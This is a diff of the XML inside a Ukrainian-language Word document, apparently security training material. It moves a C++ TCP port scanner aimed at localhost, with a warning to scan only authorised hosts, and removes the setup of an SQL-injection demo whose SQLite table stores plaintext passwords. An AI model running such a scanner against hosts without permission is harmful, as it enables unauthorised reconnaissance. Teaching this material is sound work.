-              <w:t xml:space="preserve">    sockaddr_in address{};</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    address.sin_family = AF_INET;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    address.sin_port = htons(static_cast&lt;unsigned short&gt;(port));</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    inet_pton(AF_INET, host.c_str(), &amp;address.sin_addr);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    bool opened =</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        connect(sock, reinterpret_cast&lt;sockaddr*&gt;(&amp;address), sizeof(address)) == 0;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    closesocket(sock);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    return opened;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">int main() {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    // УВАГА: сканувати дозволено лише власний комп'ютер або вузол,</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    // на який є письмовий дозвіл власника</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    const std::string target = "127.0.0.1";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    const std::vector&lt;int&gt; ports = {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        21, 22, 23, 25, 53, 80, 110, 135, 139, 143,</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        443, 445, 993, 995, 1433, 3306, 3389, 5432, 8080</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    };</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">#ifdef _WIN32</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    WSADATA wsa;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    if (WSAStartup(MAKEWORD(2, 2), &amp;wsa) != 0) {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        std::cerr &lt;&lt; "Не вдалося ініціалізувати Winsock\n";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        return 1;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    }</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">#endif</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    std::cout &lt;&lt; "Сканування " &lt;&lt; target &lt;&lt; "...\n\n";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    std::cout &lt;&lt; "Відкриті порти:\n";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    int found = 0;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    for (int port : ports) {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        if (isPortOpen(target, port)) {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">            std::cout &lt;&lt; "  " &lt;&lt; port &lt;&lt; "/tcp - " &lt;&lt; serviceName(port) &lt;&lt; "\n";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">            ++found;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        }</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    }</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    if (found == 0) {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        std::cout &lt;&lt; "  (жодного з перевірених портів не відкрито)\n";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    }</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">#ifdef _WIN32</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    WSACleanup();</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">#endif</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    return 0;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">}</w:t>
+              <w:t xml:space="preserve"># Linux</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">ss -tuln | grep LISTEN</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3954,24 +3289,14 @@
         </w:rPr>
       </w:pPr>
     </w:p>
-    <w:bookmarkEnd w:id="23"/>
-    <w:bookmarkEnd w:id="24"/>
-    <w:bookmarkStart w:id="26" w:name="завдання-4-захист-веб-застосунку"/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Завдання 4: Захист веб-застосунку</w:t>
-      </w:r>
-    </w:p>
-    <w:bookmarkStart w:id="25" w:name="демонстрація-sql-інєкції-та-захисту"/>
+    <w:bookmarkEnd w:id="22"/>
+    <w:bookmarkStart w:id="23" w:name="базове-сканування-портів"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Демонстрація SQL-ін’єкції та захисту</w:t>
+        <w:t xml:space="preserve">Базове сканування портів</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4019,25 +3344,25 @@
               <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">// Демонстрація SQL-ін'єкції та захисту від неї.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">// Потрібна бібліотека SQLite: у Visual Studio додайте sqlite3.c і sqlite3.h</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">// до проєкту (амальгама з sqlite.org) або підключіть пакет через NuGet.</w:t>
+              <w:t xml:space="preserve">// Сканер портів. Збірка у Visual Studio: проєкт консольного застосунку,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// у властивостях додати бібліотеку ws2_32.lib</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// (Linker → Input → Additional Dependencies).</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4064,169 +3389,292 @@
               <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">#include "sqlite3.h"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">// Створює навчальну базу в пам'яті з двома обліковими записами</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">sqlite3* setupDatabase() {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    sqlite3* db = nullptr;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    sqlite3_open(":memory:", &amp;db);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    const char* schema =</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        "CREATE TABLE users ("</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        "  id INTEGER PRIMARY KEY,"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        "  login TEXT NOT NULL,"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        "  password TEXT NOT NULL,"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        "  role TEXT DEFAULT 'user');"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        "INSERT INTO users (login, password, role) "</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        "VALUES ('admin', 'secret123', 'admin');"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        "INSERT INTO users (login, password, role) "</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        "VALUES ('user1', 'pass1', 'user');";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    sqlite3_exec(db, schema, nullptr, nullptr, nullptr);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    return db;</w:t>
+              <w:t xml:space="preserve">#include &lt;vector&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#ifdef _WIN32</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #include &lt;winsock2.h&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #include &lt;ws2tcpip.h&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #pragma comment(lib, "ws2_32.lib")</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  using socket_t = SOCKET;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  const socket_t INVALID_SOCK = INVALID_SOCKET;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#else</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #include &lt;sys/socket.h&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #include &lt;arpa/inet.h&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #include &lt;unistd.h&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  using socket_t = int;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  const socket_t INVALID_SOCK = -1;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  #define closesocket close</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">#endif</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">struct ServiceName {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    int port;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    const char* name;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">};</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">const ServiceName KNOWN_SERVICES[] = {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    {21, "FTP"},   {22, "SSH"},   {23, "Telnet"}, {25, "SMTP"},</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    {53, "DNS"},   {80, "HTTP"},  {110, "POP3"},  {143, "IMAP"},</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    {443, "HTTPS"},{445, "SMB"},  {3306, "MySQL"},{3389, "RDP"},</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    {5432, "PostgreSQL"}, {8080, "HTTP-alt"}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">};</w:t>
